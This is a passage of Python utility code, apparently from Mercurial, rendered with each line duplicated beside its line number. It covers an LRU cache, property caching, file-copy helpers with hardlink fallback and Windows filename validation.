1309 node = self._addcapacity()
1310 else:
1310 else:
1311 # Grab the last/oldest item.
1311 # Grab the last/oldest item.
1312 node = self._head.prev
1312 node = self._head.prev
1313
1313
1314 # At capacity. Kill the old entry.
1314 # At capacity. Kill the old entry.
1315 if node.key is not _notset:
1315 if node.key is not _notset:
1316 self.totalcost -= node.cost
1316 self.totalcost -= node.cost
1317 del self._cache[node.key]
1317 del self._cache[node.key]
1318
1318
1319 node.key = k
1319 node.key = k
1320 node.value = v
1320 node.value = v
1321 node.cost = cost
1321 node.cost = cost
1322 self.totalcost += cost
1322 self.totalcost += cost
1323 self._cache[k] = node
1323 self._cache[k] = node
1324 # And mark it as newest entry. No need to adjust order since it
1324 # And mark it as newest entry. No need to adjust order since it
1325 # is already self._head.prev.
1325 # is already self._head.prev.
1326 self._head = node
1326 self._head = node
1327
1327
1328 if self.maxcost:
1328 if self.maxcost:
1329 self._enforcecostlimit()
1329 self._enforcecostlimit()
1330
1330
1331 def __setitem__(self, k, v):
1331 def __setitem__(self, k, v):
1332 self.insert(k, v)
1332 self.insert(k, v)
1333
1333
1334 def __delitem__(self, k):
1334 def __delitem__(self, k):
1335 self.pop(k)
1335 self.pop(k)
1336
1336
1337 def pop(self, k, default=_notset):
1337 def pop(self, k, default=_notset):
1338 try:
1338 try:
1339 node = self._cache.pop(k)
1339 node = self._cache.pop(k)
1340 except KeyError:
1340 except KeyError:
1341 if default is _notset:
1341 if default is _notset:
1342 raise
1342 raise
1343 return default
1343 return default
1344 value = node.value
1344 value = node.value
1345 self.totalcost -= node.cost
1345 self.totalcost -= node.cost
1346 node.markempty()
1346 node.markempty()
1347
1347
1348 # Temporarily mark as newest item before re-adjusting head to make
1348 # Temporarily mark as newest item before re-adjusting head to make
1349 # this node the oldest item.
1349 # this node the oldest item.
1350 self._movetohead(node)
1350 self._movetohead(node)
1351 self._head = node.next
1351 self._head = node.next
1352
1352
1353 return value
1353 return value
1354
1354
1355 # Additional dict methods.
1355 # Additional dict methods.
1356
1356
1357 def get(self, k, default=None):
1357 def get(self, k, default=None):
1358 try:
1358 try:
1359 return self.__getitem__(k)
1359 return self.__getitem__(k)
1360 except KeyError:
1360 except KeyError:
1361 return default
1361 return default
1362
1362
1363 def peek(self, k, default=_notset):
1363 def peek(self, k, default=_notset):
1364 """Get the specified item without moving it to the head
1364 """Get the specified item without moving it to the head
1365
1365
1366 Unlike get(), this doesn't mutate the internal state. But be aware
1366 Unlike get(), this doesn't mutate the internal state. But be aware
1367 that it doesn't mean peek() is thread safe.
1367 that it doesn't mean peek() is thread safe.
1368 """
1368 """
1369 try:
1369 try:
1370 node = self._cache[k]
1370 node = self._cache[k]
1371 return node.value
1371 return node.value
1372 except KeyError:
1372 except KeyError:
1373 if default is _notset:
1373 if default is _notset:
1374 raise
1374 raise
1375 return default
1375 return default
1376
1376
1377 def clear(self):
1377 def clear(self):
1378 n = self._head
1378 n = self._head
1379 while n.key is not _notset:
1379 while n.key is not _notset:
1380 self.totalcost -= n.cost
1380 self.totalcost -= n.cost
1381 n.markempty()
1381 n.markempty()
1382 n = n.next
1382 n = n.next
1383
1383
1384 self._cache.clear()
1384 self._cache.clear()
1385
1385
1386 def copy(self, capacity=None, maxcost=0):
1386 def copy(self, capacity=None, maxcost=0):
1387 """Create a new cache as a copy of the current one.
1387 """Create a new cache as a copy of the current one.
1388
1388
1389 By default, the new cache has the same capacity as the existing one.
1389 By default, the new cache has the same capacity as the existing one.
1390 But, the cache capacity can be changed as part of performing the
1390 But, the cache capacity can be changed as part of performing the
1391 copy.
1391 copy.
1392
1392
1393 Items in the copy have an insertion/access order matching this
1393 Items in the copy have an insertion/access order matching this
1394 instance.
1394 instance.
1395 """
1395 """
1396
1396
1397 capacity = capacity or self.capacity
1397 capacity = capacity or self.capacity
1398 maxcost = maxcost or self.maxcost
1398 maxcost = maxcost or self.maxcost
1399 result = lrucachedict(capacity, maxcost=maxcost)
1399 result = lrucachedict(capacity, maxcost=maxcost)
1400
1400
1401 # We copy entries by iterating in oldest-to-newest order so the copy
1401 # We copy entries by iterating in oldest-to-newest order so the copy
1402 # has the correct ordering.
1402 # has the correct ordering.
1403
1403
1404 # Find the first non-empty entry.
1404 # Find the first non-empty entry.
1405 n = self._head.prev
1405 n = self._head.prev
1406 while n.key is _notset and n is not self._head:
1406 while n.key is _notset and n is not self._head:
1407 n = n.prev
1407 n = n.prev
1408
1408
1409 # We could potentially skip the first N items when decreasing capacity.
1409 # We could potentially skip the first N items when decreasing capacity.
1410 # But let's keep it simple unless it is a performance problem.
1410 # But let's keep it simple unless it is a performance problem.
1411 for i in range(len(self._cache)):
1411 for i in range(len(self._cache)):
1412 result.insert(n.key, n.value, cost=n.cost)
1412 result.insert(n.key, n.value, cost=n.cost)
1413 n = n.prev
1413 n = n.prev
1414
1414
1415 return result
1415 return result
1416
1416
1417 def popoldest(self):
1417 def popoldest(self):
1418 """Remove the oldest item from the cache.
1418 """Remove the oldest item from the cache.
1419
1419
1420 Returns the (key, value) describing the removed cache entry.
1420 Returns the (key, value) describing the removed cache entry.
1421 """
1421 """
1422 if not self._cache:
1422 if not self._cache:
1423 return
1423 return
1424
1424
1425 # Walk the linked list backwards starting at tail node until we hit
1425 # Walk the linked list backwards starting at tail node until we hit
1426 # a non-empty node.
1426 # a non-empty node.
1427 n = self._head.prev
1427 n = self._head.prev
1428 while n.key is _notset:
1428 while n.key is _notset:
1429 n = n.prev
1429 n = n.prev
1430
1430
1431 key, value = n.key, n.value
1431 key, value = n.key, n.value
1432
1432
1433 # And remove it from the cache and mark it as empty.
1433 # And remove it from the cache and mark it as empty.
1434 del self._cache[n.key]
1434 del self._cache[n.key]
1435 self.totalcost -= n.cost
1435 self.totalcost -= n.cost
1436 n.markempty()
1436 n.markempty()
1437
1437
1438 return key, value
1438 return key, value
1439
1439
1440 def _movetohead(self, node):
1440 def _movetohead(self, node):
1441 """Mark a node as the newest, making it the new head.
1441 """Mark a node as the newest, making it the new head.
1442
1442
1443 When a node is accessed, it becomes the freshest entry in the LRU
1443 When a node is accessed, it becomes the freshest entry in the LRU
1444 list, which is denoted by self._head.
1444 list, which is denoted by self._head.
1445
1445
1446 Visually, let's make ``N`` the new head node (* denotes head):
1446 Visually, let's make ``N`` the new head node (* denotes head):
1447
1447
1448 previous/oldest <-> head <-> next/next newest
1448 previous/oldest <-> head <-> next/next newest
1449
1449
1450 ----<->--- A* ---<->-----
1450 ----<->--- A* ---<->-----
1451 | |
1451 | |
1452 E <-> D <-> N <-> C <-> B
1452 E <-> D <-> N <-> C <-> B
1453
1453
1454 To:
1454 To:
1455
1455
1456 ----<->--- N* ---<->-----
1456 ----<->--- N* ---<->-----
1457 | |
1457 | |
1458 E <-> D <-> C <-> B <-> A
1458 E <-> D <-> C <-> B <-> A
1459
1459
1460 This requires the following moves:
1460 This requires the following moves:
1461
1461
1462 C.next = D (node.prev.next = node.next)
1462 C.next = D (node.prev.next = node.next)
1463 D.prev = C (node.next.prev = node.prev)
1463 D.prev = C (node.next.prev = node.prev)
1464 E.next = N (head.prev.next = node)
1464 E.next = N (head.prev.next = node)
1465 N.prev = E (node.prev = head.prev)
1465 N.prev = E (node.prev = head.prev)
1466 N.next = A (node.next = head)
1466 N.next = A (node.next = head)
1467 A.prev = N (head.prev = node)
1467 A.prev = N (head.prev = node)
1468 """
1468 """
1469 head = self._head
1469 head = self._head
1470 # C.next = D
1470 # C.next = D
1471 node.prev.next = node.next
1471 node.prev.next = node.next
1472 # D.prev = C
1472 # D.prev = C
1473 node.next.prev = node.prev
1473 node.next.prev = node.prev
1474 # N.prev = E
1474 # N.prev = E
1475 node.prev = head.prev
1475 node.prev = head.prev
1476 # N.next = A
1476 # N.next = A
1477 # It is tempting to do just "head" here, however if node is
1477 # It is tempting to do just "head" here, however if node is
1478 # adjacent to head, this will do bad things.
1478 # adjacent to head, this will do bad things.
1479 node.next = head.prev.next
1479 node.next = head.prev.next
1480 # E.next = N
1480 # E.next = N
1481 node.next.prev = node
1481 node.next.prev = node
1482 # A.prev = N
1482 # A.prev = N
1483 node.prev.next = node
1483 node.prev.next = node
1484
1484
1485 self._head = node
1485 self._head = node
1486
1486
1487 def _addcapacity(self):
1487 def _addcapacity(self):
1488 """Add a node to the circular linked list.
1488 """Add a node to the circular linked list.
1489
1489
1490 The new node is inserted before the head node.
1490 The new node is inserted before the head node.
1491 """
1491 """
1492 head = self._head
1492 head = self._head
1493 node = _lrucachenode()
1493 node = _lrucachenode()
1494 head.prev.next = node
1494 head.prev.next = node
1495 node.prev = head.prev
1495 node.prev = head.prev
1496 node.next = head
1496 node.next = head
1497 head.prev = node
1497 head.prev = node
1498 self._size += 1
1498 self._size += 1
1499 return node
1499 return node
1500
1500
1501 def _enforcecostlimit(self):
1501 def _enforcecostlimit(self):
1502 # This should run after an insertion. It should only be called if total
1502 # This should run after an insertion. It should only be called if total
1503 # cost limits are being enforced.
1503 # cost limits are being enforced.
1504 # The most recently inserted node is never evicted.
1504 # The most recently inserted node is never evicted.
1505 if len(self) <= 1 or self.totalcost <= self.maxcost:
1505 if len(self) <= 1 or self.totalcost <= self.maxcost:
1506 return
1506 return
1507
1507
1508 # This is logically equivalent to calling popoldest() until we
1508 # This is logically equivalent to calling popoldest() until we
1509 # free up enough cost. We don't do that since popoldest() needs
1509 # free up enough cost. We don't do that since popoldest() needs
1510 # to walk the linked list and doing this in a loop would be
1510 # to walk the linked list and doing this in a loop would be
1511 # quadratic. So we find the first non-empty node and then
1511 # quadratic. So we find the first non-empty node and then
1512 # walk nodes until we free up enough capacity.
1512 # walk nodes until we free up enough capacity.
1513 #
1513 #
1514 # If we only removed the minimum number of nodes to free enough
1514 # If we only removed the minimum number of nodes to free enough
1515 # cost at insert time, chances are high that the next insert would
1515 # cost at insert time, chances are high that the next insert would
1516 # also require pruning. This would effectively constitute quadratic
1516 # also require pruning. This would effectively constitute quadratic
1517 # behavior for insert-heavy workloads. To mitigate this, we set a
1517 # behavior for insert-heavy workloads. To mitigate this, we set a
1518 # target cost that is a percentage of the max cost. This will tend
1518 # target cost that is a percentage of the max cost. This will tend
1519 # to free more nodes when the high water mark is reached, which
1519 # to free more nodes when the high water mark is reached, which
1520 # lowers the chances of needing to prune on the subsequent insert.
1520 # lowers the chances of needing to prune on the subsequent insert.
1521 targetcost = int(self.maxcost * 0.75)
1521 targetcost = int(self.maxcost * 0.75)
1522
1522
1523 n = self._head.prev
1523 n = self._head.prev
1524 while n.key is _notset:
1524 while n.key is _notset:
1525 n = n.prev
1525 n = n.prev
1526
1526
1527 while len(self) > 1 and self.totalcost > targetcost:
1527 while len(self) > 1 and self.totalcost > targetcost:
1528 del self._cache[n.key]
1528 del self._cache[n.key]
1529 self.totalcost -= n.cost
1529 self.totalcost -= n.cost
1530 n.markempty()
1530 n.markempty()
1531 n = n.prev
1531 n = n.prev
1532
1532
1533 def lrucachefunc(func):
1533 def lrucachefunc(func):
1534 '''cache most recent results of function calls'''
1534 '''cache most recent results of function calls'''
1535 cache = {}
1535 cache = {}
1536 order = collections.deque()
1536 order = collections.deque()
1537 if func.__code__.co_argcount == 1:
1537 if func.__code__.co_argcount == 1:
1538 def f(arg):
1538 def f(arg):
1539 if arg not in cache:
1539 if arg not in cache:
1540 if len(cache) > 20:
1540 if len(cache) > 20:
1541 del cache[order.popleft()]
1541 del cache[order.popleft()]
1542 cache[arg] = func(arg)
1542 cache[arg] = func(arg)
1543 else:
1543 else:
1544 order.remove(arg)
1544 order.remove(arg)
1545 order.append(arg)
1545 order.append(arg)
1546 return cache[arg]
1546 return cache[arg]
1547 else:
1547 else:
1548 def f(*args):
1548 def f(*args):
1549 if args not in cache:
1549 if args not in cache:
1550 if len(cache) > 20:
1550 if len(cache) > 20:
1551 del cache[order.popleft()]
1551 del cache[order.popleft()]
1552 cache[args] = func(*args)
1552 cache[args] = func(*args)
1553 else:
1553 else:
1554 order.remove(args)
1554 order.remove(args)
1555 order.append(args)
1555 order.append(args)
1556 return cache[args]
1556 return cache[args]
1557
1557
1558 return f
1558 return f
1559
1559
1560 class propertycache(object):
1560 class propertycache(object):
1561 def __init__(self, func):
1561 def __init__(self, func):
1562 self.func = func
1562 self.func = func
1563 self.name = func.__name__
1563 self.name = func.__name__
1564 def __get__(self, obj, type=None):
1564 def __get__(self, obj, type=None):
1565 result = self.func(obj)
1565 result = self.func(obj)
1566 self.cachevalue(obj, result)
1566 self.cachevalue(obj, result)
1567 return result
1567 return result
1568
1568
1569 def cachevalue(self, obj, value):
1569 def cachevalue(self, obj, value):
1570 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1570 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1571 obj.__dict__[self.name] = value
1571 obj.__dict__[self.name] = value
1572
1572
1573 def clearcachedproperty(obj, prop):
1573 def clearcachedproperty(obj, prop):
1574 '''clear a cached property value, if one has been set'''
1574 '''clear a cached property value, if one has been set'''
1575 prop = pycompat.sysstr(prop)
1575 prop = pycompat.sysstr(prop)
1576 if prop in obj.__dict__:
1576 if prop in obj.__dict__:
1577 del obj.__dict__[prop]
1577 del obj.__dict__[prop]
1578
1578
1579 def increasingchunks(source, min=1024, max=65536):
1579 def increasingchunks(source, min=1024, max=65536):
1580 '''return no less than min bytes per chunk while data remains,
1580 '''return no less than min bytes per chunk while data remains,
1581 doubling min after each chunk until it reaches max'''
1581 doubling min after each chunk until it reaches max'''
1582 def log2(x):
1582 def log2(x):
1583 if not x:
1583 if not x:
1584 return 0
1584 return 0
1585 i = 0
1585 i = 0
1586 while x:
1586 while x:
1587 x >>= 1
1587 x >>= 1
1588 i += 1
1588 i += 1
1589 return i - 1
1589 return i - 1
1590
1590
1591 buf = []
1591 buf = []
1592 blen = 0
1592 blen = 0
1593 for chunk in source:
1593 for chunk in source:
1594 buf.append(chunk)
1594 buf.append(chunk)
1595 blen += len(chunk)
1595 blen += len(chunk)
1596 if blen >= min:
1596 if blen >= min:
1597 if min < max:
1597 if min < max:
1598 min = min << 1
1598 min = min << 1
1599 nmin = 1 << log2(blen)
1599 nmin = 1 << log2(blen)
1600 if nmin > min:
1600 if nmin > min:
1601 min = nmin
1601 min = nmin
1602 if min > max:
1602 if min > max:
1603 min = max
1603 min = max
1604 yield ''.join(buf)
1604 yield ''.join(buf)
1605 blen = 0
1605 blen = 0
1606 buf = []
1606 buf = []
1607 if buf:
1607 if buf:
1608 yield ''.join(buf)
1608 yield ''.join(buf)
1609
1609
1610 def always(fn):
1610 def always(fn):
1611 return True
1611 return True
1612
1612
1613 def never(fn):
1613 def never(fn):
1614 return False
1614 return False
1615
1615
1616 def nogc(func):
1616 def nogc(func):
1617 """disable garbage collector
1617 """disable garbage collector
1618
1618
1619 Python's garbage collector triggers a GC each time a certain number of
1619 Python's garbage collector triggers a GC each time a certain number of
1620 container objects (the number being defined by gc.get_threshold()) are
1620 container objects (the number being defined by gc.get_threshold()) are
1621 allocated even when marked not to be tracked by the collector. Tracking has
1621 allocated even when marked not to be tracked by the collector. Tracking has
1622 no effect on when GCs are triggered, only on what objects the GC looks
1622 no effect on when GCs are triggered, only on what objects the GC looks
1623 into. As a workaround, disable GC while building complex (huge)
1623 into. As a workaround, disable GC while building complex (huge)
1624 containers.
1624 containers.
1625
1625
1626 This garbage collector issue have been fixed in 2.7. But it still affect
1626 This garbage collector issue have been fixed in 2.7. But it still affect
1627 CPython's performance.
1627 CPython's performance.
1628 """
1628 """
1629 def wrapper(*args, **kwargs):
1629 def wrapper(*args, **kwargs):
1630 gcenabled = gc.isenabled()
1630 gcenabled = gc.isenabled()
1631 gc.disable()
1631 gc.disable()
1632 try:
1632 try:
1633 return func(*args, **kwargs)
1633 return func(*args, **kwargs)
1634 finally:
1634 finally:
1635 if gcenabled:
1635 if gcenabled:
1636 gc.enable()
1636 gc.enable()
1637 return wrapper
1637 return wrapper
1638
1638
1639 if pycompat.ispypy:
1639 if pycompat.ispypy:
1640 # PyPy runs slower with gc disabled
1640 # PyPy runs slower with gc disabled
1641 nogc = lambda x: x
1641 nogc = lambda x: x
1642
1642
1643 def pathto(root, n1, n2):
1643 def pathto(root, n1, n2):
1644 '''return the relative path from one place to another.
1644 '''return the relative path from one place to another.
1645 root should use os.sep to separate directories
1645 root should use os.sep to separate directories
1646 n1 should use os.sep to separate directories
1646 n1 should use os.sep to separate directories
1647 n2 should use "/" to separate directories
1647 n2 should use "/" to separate directories
1648 returns an os.sep-separated path.
1648 returns an os.sep-separated path.
1649
1649
1650 If n1 is a relative path, it's assumed it's
1650 If n1 is a relative path, it's assumed it's
1651 relative to root.
1651 relative to root.
1652 n2 should always be relative to root.
1652 n2 should always be relative to root.
1653 '''
1653 '''
1654 if not n1:
1654 if not n1:
1655 return localpath(n2)
1655 return localpath(n2)
1656 if os.path.isabs(n1):
1656 if os.path.isabs(n1):
1657 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1657 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1658 return os.path.join(root, localpath(n2))
1658 return os.path.join(root, localpath(n2))
1659 n2 = '/'.join((pconvert(root), n2))
1659 n2 = '/'.join((pconvert(root), n2))
1660 a, b = splitpath(n1), n2.split('/')
1660 a, b = splitpath(n1), n2.split('/')
1661 a.reverse()
1661 a.reverse()
1662 b.reverse()
1662 b.reverse()
1663 while a and b and a[-1] == b[-1]:
1663 while a and b and a[-1] == b[-1]:
1664 a.pop()
1664 a.pop()
1665 b.pop()
1665 b.pop()
1666 b.reverse()
1666 b.reverse()
1667 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1667 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1668
1668
1669 # the location of data files matching the source code
1669 # the location of data files matching the source code
1670 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1670 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1671 # executable version (py2exe) doesn't support __file__
1671 # executable version (py2exe) doesn't support __file__
1672 datapath = os.path.dirname(pycompat.sysexecutable)
1672 datapath = os.path.dirname(pycompat.sysexecutable)
1673 else:
1673 else:
1674 datapath = os.path.dirname(pycompat.fsencode(__file__))
1674 datapath = os.path.dirname(pycompat.fsencode(__file__))
1675
1675
1676 i18n.setdatapath(datapath)
1676 i18n.setdatapath(datapath)
1677
1677
1678 def checksignature(func):
1678 def checksignature(func):
1679 '''wrap a function with code to check for calling errors'''
1679 '''wrap a function with code to check for calling errors'''
1680 def check(*args, **kwargs):
1680 def check(*args, **kwargs):
1681 try:
1681 try:
1682 return func(*args, **kwargs)
1682 return func(*args, **kwargs)
1683 except TypeError:
1683 except TypeError:
1684 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1684 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1685 raise error.SignatureError
1685 raise error.SignatureError
1686 raise
1686 raise
1687
1687
1688 return check
1688 return check
1689
1689
1690 # a whilelist of known filesystems where hardlink works reliably
1690 # a whilelist of known filesystems where hardlink works reliably
1691 _hardlinkfswhitelist = {
1691 _hardlinkfswhitelist = {
1692 'apfs',
1692 'apfs',
1693 'btrfs',
1693 'btrfs',
1694 'ext2',
1694 'ext2',
1695 'ext3',
1695 'ext3',
1696 'ext4',
1696 'ext4',
1697 'hfs',
1697 'hfs',
1698 'jfs',
1698 'jfs',
1699 'NTFS',
1699 'NTFS',
1700 'reiserfs',
1700 'reiserfs',
1701 'tmpfs',
1701 'tmpfs',
1702 'ufs',
1702 'ufs',
1703 'xfs',
1703 'xfs',
1704 'zfs',
1704 'zfs',
1705 }
1705 }
1706
1706
1707 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1707 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1708 '''copy a file, preserving mode and optionally other stat info like
1708 '''copy a file, preserving mode and optionally other stat info like
1709 atime/mtime
1709 atime/mtime
1710
1710
1711 checkambig argument is used with filestat, and is useful only if
1711 checkambig argument is used with filestat, and is useful only if
1712 destination file is guarded by any lock (e.g. repo.lock or
1712 destination file is guarded by any lock (e.g. repo.lock or
1713 repo.wlock).
1713 repo.wlock).
1714
1714
1715 copystat and checkambig should be exclusive.
1715 copystat and checkambig should be exclusive.
1716 '''
1716 '''
1717 assert not (copystat and checkambig)
1717 assert not (copystat and checkambig)
1718 oldstat = None
1718 oldstat = None
1719 if os.path.lexists(dest):
1719 if os.path.lexists(dest):
1720 if checkambig:
1720 if checkambig:
1721 oldstat = checkambig and filestat.frompath(dest)
1721 oldstat = checkambig and filestat.frompath(dest)
1722 unlink(dest)
1722 unlink(dest)
1723 if hardlink:
1723 if hardlink:
1724 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1724 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1725 # unless we are confident that dest is on a whitelisted filesystem.
1725 # unless we are confident that dest is on a whitelisted filesystem.
1726 try:
1726 try:
1727 fstype = getfstype(os.path.dirname(dest))
1727 fstype = getfstype(os.path.dirname(dest))
1728 except OSError:
1728 except OSError:
1729 fstype = None
1729 fstype = None
1730 if fstype not in _hardlinkfswhitelist:
1730 if fstype not in _hardlinkfswhitelist:
1731 hardlink = False
1731 hardlink = False
1732 if hardlink:
1732 if hardlink:
1733 try:
1733 try:
1734 oslink(src, dest)
1734 oslink(src, dest)
1735 return
1735 return
1736 except (IOError, OSError):
1736 except (IOError, OSError):
1737 pass # fall back to normal copy
1737 pass # fall back to normal copy
1738 if os.path.islink(src):
1738 if os.path.islink(src):
1739 os.symlink(os.readlink(src), dest)
1739 os.symlink(os.readlink(src), dest)
1740 # copytime is ignored for symlinks, but in general copytime isn't needed
1740 # copytime is ignored for symlinks, but in general copytime isn't needed
1741 # for them anyway
1741 # for them anyway
1742 else:
1742 else:
1743 try:
1743 try:
1744 shutil.copyfile(src, dest)
1744 shutil.copyfile(src, dest)
1745 if copystat:
1745 if copystat:
1746 # copystat also copies mode
1746 # copystat also copies mode
1747 shutil.copystat(src, dest)
1747 shutil.copystat(src, dest)
1748 else:
1748 else:
1749 shutil.copymode(src, dest)
1749 shutil.copymode(src, dest)
1750 if oldstat and oldstat.stat:
1750 if oldstat and oldstat.stat:
1751 newstat = filestat.frompath(dest)
1751 newstat = filestat.frompath(dest)
1752 if newstat.isambig(oldstat):
1752 if newstat.isambig(oldstat):
1753 # stat of copied file is ambiguous to original one
1753 # stat of copied file is ambiguous to original one
1754 advanced = (
1754 advanced = (
1755 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1755 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1756 os.utime(dest, (advanced, advanced))
1756 os.utime(dest, (advanced, advanced))
1757 except shutil.Error as inst:
1757 except shutil.Error as inst:
1758 raise error.Abort(str(inst))
1758 raise error.Abort(str(inst))
1759
1759
1760 def copyfiles(src, dst, hardlink=None, progress=None):
1760 def copyfiles(src, dst, hardlink=None, progress=None):
1761 """Copy a directory tree using hardlinks if possible."""
1761 """Copy a directory tree using hardlinks if possible."""
1762 num = 0
1762 num = 0
1763
1763
1764 def settopic():
1764 def settopic():
1765 if progress:
1765 if progress:
1766 progress.topic = _('linking') if hardlink else _('copying')
1766 progress.topic = _('linking') if hardlink else _('copying')
1767
1767
1768 if os.path.isdir(src):
1768 if os.path.isdir(src):
1769 if hardlink is None:
1769 if hardlink is None:
1770 hardlink = (os.stat(src).st_dev ==
1770 hardlink = (os.stat(src).st_dev ==
1771 os.stat(os.path.dirname(dst)).st_dev)
1771 os.stat(os.path.dirname(dst)).st_dev)
1772 settopic()
1772 settopic()
1773 os.mkdir(dst)
1773 os.mkdir(dst)
1774 for name, kind in listdir(src):
1774 for name, kind in listdir(src):
1775 srcname = os.path.join(src, name)
1775 srcname = os.path.join(src, name)
1776 dstname = os.path.join(dst, name)
1776 dstname = os.path.join(dst, name)
1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1777 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1778 num += n
1778 num += n
1779 else:
1779 else:
1780 if hardlink is None:
1780 if hardlink is None:
1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1781 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1782 os.stat(os.path.dirname(dst)).st_dev)
1782 os.stat(os.path.dirname(dst)).st_dev)
1783 settopic()
1783 settopic()
1784
1784
1785 if hardlink:
1785 if hardlink:
1786 try:
1786 try:
1787 oslink(src, dst)
1787 oslink(src, dst)
1788 except (IOError, OSError):
1788 except (IOError, OSError):
1789 hardlink = False
1789 hardlink = False
1790 shutil.copy(src, dst)
1790 shutil.copy(src, dst)
1791 else:
1791 else:
1792 shutil.copy(src, dst)
1792 shutil.copy(src, dst)
1793 num += 1
1793 num += 1
1794 if progress:
1794 if progress:
1795 progress.increment()
1795 progress.increment()
1796
1796
1797 return hardlink, num
1797 return hardlink, num
1798
1798
1799 _winreservednames = {
1799 _winreservednames = {
1800 'con', 'prn', 'aux', 'nul',
1800 'con', 'prn', 'aux', 'nul',
1801 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1801 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1802 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1802 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1803 }
1803 }
1804 _winreservedchars = ':*?"<>|'
1804 _winreservedchars = ':*?"<>|'
1805 def checkwinfilename(path):
1805 def checkwinfilename(path):
1806 r'''Check that the base-relative path is a valid filename on Windows.
1806 r'''Check that the base-relative path is a valid filename on Windows.
1807 Returns None if the path is ok, or a UI string describing the problem.
1807 Returns None if the path is ok, or a UI string describing the problem.
1808
1808
1809 >>> checkwinfilename(b"just/a/normal/path")
1809 >>> checkwinfilename(b"just/a/normal/path")
1810 >>> checkwinfilename(b"foo/bar/con.xml")
1810 >>> checkwinfilename(b"foo/bar/con.xml")
1811 "filename contains 'con', which is reserved on Windows"
1811 "filename contains 'con', which is reserved on Windows"
1812 >>> checkwinfilename(b"foo/con.xml/bar")
1812 >>> checkwinfilename(b"foo/con.xml/bar")
1813 "filename contains 'con', which is reserved on Windows"
1813 "filename contains 'con', which is reserved on Windows"
1814 >>> checkwinfilename(b"foo/bar/xml.con")
1814 >>> checkwinfilename(b"foo/bar/xml.con")
1815 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1815 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1816 "filename contains 'AUX', which is reserved on Windows"
1816 "filename contains 'AUX', which is reserved on Windows"
1817 >>> checkwinfilename(b"foo/bar/bla:.txt")
1817 >>> checkwinfilename(b"foo/bar/bla:.txt")
1818 "filename contains ':', which is reserved on Windows"
1818 "filename contains ':', which is reserved on Windows"
1819 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1819 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1820 "filename contains '\\x07', which is invalid on Windows"
1820 "filename contains '\\x07', which is invalid on Windows"
1821 >>> checkwinfilename(b"foo/bar/bla ")
1821 >>> checkwinfilename(b"foo/bar/bla ")
1822 "filename ends with ' ', which is not allowed on Windows"
1822 "filename ends with ' ', which is not allowed on Windows"
1823 >>> checkwinfilename(b"../bar")
1823 >>> checkwinfilename(b"../bar")
1824 >>> checkwinfilename(b"foo\\")
1824 >>> checkwinfilename(b"foo\\")
1825 "filename ends with '\\', which is invalid on Windows"
1825 "filename ends with '\\', which is invalid on Windows"
1826 >>> checkwinfilename(b"foo\\/bar")
1826 >>> checkwinfilename(b"foo\\/bar")
1827 "directory name ends with '\\', which is invalid on Windows"
1827 "directory name ends with '\\', which is invalid on Windows"
1828 '''
1828 '''
1829 if path.endswith('\\'):
1829 if path.endswith('\\'):
1830 return _("filename ends with '\\', which is invalid on Windows")
1830 return _("filename ends with '\\', which is invalid on Windows")
1831 if '\\/' in path:
1831 if '\\/' in path:
1832 return _("directory name ends with '\\', which is invalid on Windows")
1832 return _("directory name ends with '\\', which is invalid on Windows")
1833 for n in path.replace('\\', '/').split('/'):
1833 for n in path.replace('\\', '/').split('/'):
1834 if not n:
1834 if not n:
1835 continue
1835 continue
1836 for c in _filenamebytestr(n):
1836 for c in _filenamebytestr(n):
1837 if c in _winreservedchars:
1837 if c in _winreservedchars:
1838 return _("filename contains '%s', which is reserved "
1838 return _("filename contains '%s', which is reserved "
1839 "on Windows") % c
1839 "on Windows") % c
1840 if ord(c) <= 31:
1840 if ord(c) <= 31:
1841 return _("filename contains '%s', which is invalid "
1841 return _("filename contains '%s', which is invalid "
1842 "on Windows") % stringutil.escapestr(c)
1842 "on Windows") % stringutil.escapestr(c)
1843 base = n.split('.')[0]
1843 base = n.split('.')[0]
1844 if base and base.lower() in _winreservednames:
1844 if base and base.lower() in _winreservednames:
1845 return _("filename contains '%s', which is reserved "
1845 return _("filename contains '%s', which is reserved "
1846 "on Windows") % base
1846 "on Windows") % base
1847 t = n[-1:]
1847 t = n[-1:]
1848 if t in '. ' and n not in '..':
1848 if t in '. ' and n not in '..':
1849 return _("filename ends with '%s', which is not allowed "
1849 return _("filename ends with '%s', which is not allowed "
1850 "on Windows") % t
1850 "on Windows") % t
1851
1851
1852 if pycompat.iswindows:
1852 if pycompat.iswindows:
1853 checkosfilename = checkwinfilename
1853 checkosfilename = checkwinfilename
1854 timer = time.clock
1854 timer = time.clock
1855 else:
1855 else:
1856 checkosfilename = platform.checkosfilename
1856 checkosfilename = platform.checkosfilename
1857 timer = time.time
1857 timer = time.time
1858
1858
1859 if safehasattr(time, "perf_counter"):
1859 if safehasattr(time, "perf_counter"):
